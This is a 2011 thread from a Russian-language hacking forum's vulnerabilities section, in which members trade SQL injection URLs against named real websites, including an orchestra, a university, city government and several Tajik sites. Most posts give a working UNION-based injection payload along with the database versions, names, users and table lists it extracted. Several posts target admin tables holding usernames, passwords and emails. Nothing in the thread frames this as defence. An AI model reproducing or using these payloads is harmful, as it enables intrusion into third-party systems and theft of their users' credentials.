HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #14381  
Старый 08.11.2011, 22:51
smirk
Guest
Сообщений: n/a
Провел на форуме:
45774

Репутация: 26
По умолчанию

Цитата:
Сообщение от OxoTnik  
OxoTnik said:
Лимит и вперёд
было =/

/printthread.php?t=21336&page=6508&pp=1
 
Ответить с цитированием

  #14382  
Старый 09.11.2011, 12:25
g0rm0n
Guest
Сообщений: n/a
Провел на форуме:
3951

Репутация: 0
По умолчанию

Код:
Code:
http://www.enridan.com/place.php?id=8+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,3,4,5,6,7,8--+
4.0.27-log:enridandb:enridan@localhost
 
Ответить с цитированием

  #14383  
Старый 09.11.2011, 15:50
aydin-ka
Новичок
Регистрация: 03.05.2009
Сообщений: 7
Провел на форуме:
102906

Репутация: -14
По умолчанию

The official site of the Armenian Philharmonic Orchestra

тиЦ 40 PR 5


Код:
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws%280x3a,user%28%29,database%28%29,version%28%29%29,10--
apo_apo@localhost:apo_apo:5.0.92-community-log

Код:
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,group_concat%28table_name%29,10+from+INFORMATION_SCHEMA.COLUMNS--
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]admin

apo_news

artists

attachments

concerts

gallery

guest
[/COLOR][/COLOR
Интересная таблица "admin"

Код:
Code:
http://www.apo.am/index.php?content=1&id=9999999+union+select+1,2,3,4,5,6,7,8,concat_ws%28id,0x3a,email%29,10+FROM+admin--
http://www.apo.am/phpinfo.php - Это без комментариев
 
Ответить с цитированием

  #14384  
Старый 09.11.2011, 19:19
vaddd
Познающий
Регистрация: 06.01.2009
Сообщений: 69
Провел на форуме:
116125

Репутация: 3
По умолчанию

http://bgnevesta.com/hotornot/viewcomments.php?phid=0%20union%20select%201,usern ame,3,password,5,6%20from%20admin--#

PR 3
 
Ответить с цитированием

  #14385  
Старый 10.11.2011, 17:24
maxim2142
Новичок
Регистрация: 31.05.2010
Сообщений: 0
Провел на форуме:
6866

Репутация: 0
По умолчанию

Новосибирский Государственный Технический Университет

Код:
Code:
http://inform.nstu.ru/index.php?type=mir&stat=617
nginx/0.7.62
PHP/5.2.17 ZendServer/5.0
MySQL >=5
inform@localhost
5.0.77
inform@localhost
hosting.nstu.ru
Data Bases: 	information_schema
		inform
		test
 
Ответить с цитированием

  #14386  
Старый 10.11.2011, 18:56
OxoTnik
Guest
Сообщений: n/a
Провел на форуме:
290351

Репутация: 173
По умолчанию

http://www.gamer365.hu/profile.php?user_id=128+and+1=0+union+select+1,tab le_name,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,42 ,53,54,55+from+information_schema.tables%20limit%2 043,1--
 
Ответить с цитированием

  #14387  
Старый 10.11.2011, 20:46
Bramin
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199

Репутация: 127
Отправить сообщение для Bramin с помощью ICQ
По умолчанию

PR 5 ТИЦ 100

http://www.bgiki.ru/news/more.php?id=-168+union+select+1,2,3,version()--

version =5.1.41-log=
 
Ответить с цитированием

  #14388  
Старый 10.11.2011, 20:52
Unknown
Guest
Сообщений: n/a
Провел на форуме:
129743

Репутация: 92
По умолчанию

За Русского и Эстонского пилота. Часть 1

Site: joblist.tj

Код:
Code:
http://www.joblist.tj/showvacancy.php?id=-1478+union+Select+1,concat_ws(version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+--+
version: 5.0.91-community-log

database: develop_joblisttj

user: develop_ns@localhost

+ Уязвимый параметр:

Код:
Code:
/index.php?catid=11'SQL-Injection'
database found:

Код:
Code:
develop_aboutsa
develop_agromoldova
develop_apartments
develop_aport
develop_artishock
develop_blog
develop_bulgaria
develop_cbs
develop_cimul
develop_ctv
develop_decoretto
develop_developweb
develop_egypt
develop_elena
develop_joblisttj
develop_kitchen
develop_livetravelhelp
develop_moldovapiese
develop_mykupe
develop_nikitablog
develop_ritus
develop_rusnac
develop_rybak
develop_rybakforum
develop_turkey
develop_turkeys
develop_vesco
develop_worldofmoldova
develop_za (Самая интересная)
Site: baza.kob.tj

Код:
Code:
http://baza.kob.tj/?a=orgtype&id=-45+union+select+concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29,2,3+--+
version: 5.0.92-community

database: kobtj_db

user: kobtj_dbuser@localhost

Site: person.tj

Код:
Code:
http://www.person.tj/index.php?id=-938+union+select+1,concat_ws%280x3a,version%28%29,database%28%29,user%28%29%29+--+
version: 4.1.25

database: person

user: user@localhost

Site: dictionary.tj

Код:
Code:
http://dictionary.tj/finance/index.php?id=-1012+union+select+1,concat_ws(0x3a,version(),database(),user())+--+
version: 4.1.25

database: base

user: user@localhost
 
Ответить с цитированием

  #14389  
Старый 11.11.2011, 02:40
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от None  
http://www.animalshaveproblemstoo.com/view.php?id=-001+union+select+1,2,3,4,5,version(),7,8,9,10
4.0.30-max-log
 
Ответить с цитированием

  #14390  
Старый 11.11.2011, 12:43
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию

Немного американщины =/

Site:adenamontessori.us

PR=2

Inject

Код:
Code:
_ttp://adenamontessori.us/product.php?cid=4+and+substring((@@version),1,1)=4
Version:4.1.24-max-log

Database:josephbiz

User:josephbiz@68.178.254.81

-----------------------------------------------------

-----------------------------------------------------

Site:www.ci.bartlesville.ok.us

PR=5


Inject

Код:
Code:
_ttp://www.ci.bartlesville.ok.us/category.php?cat=1041+and+substring((@@version),1,1)=4
Version:4.0.30-max-log

Database:pendergraphics

User:pendergraphics@68.178.254.114

-----------------------------------------------------

-----------------------------------------------------

Site:www.simcom.us

PR=2


Inject

Код:
Code:
_ttp://www.simcom.us/product_detail.php?cid=1&pid=14+and+1=2+union+select+1,2,version(),database(),user(),6,7,8,9,10,11,12,13,14,15
Version:4.0.27-max-log

Database:db295004332

User:dbo295004332@74.208.122.71
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ